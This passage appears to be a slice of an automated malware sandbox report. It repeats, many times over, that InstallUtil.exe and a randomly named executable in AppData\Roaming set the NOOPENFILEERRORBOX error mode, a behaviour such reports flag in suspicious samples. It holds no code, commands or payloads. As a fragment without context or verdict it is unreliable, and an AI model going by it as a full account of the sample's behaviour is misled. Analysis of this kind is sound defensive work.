                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
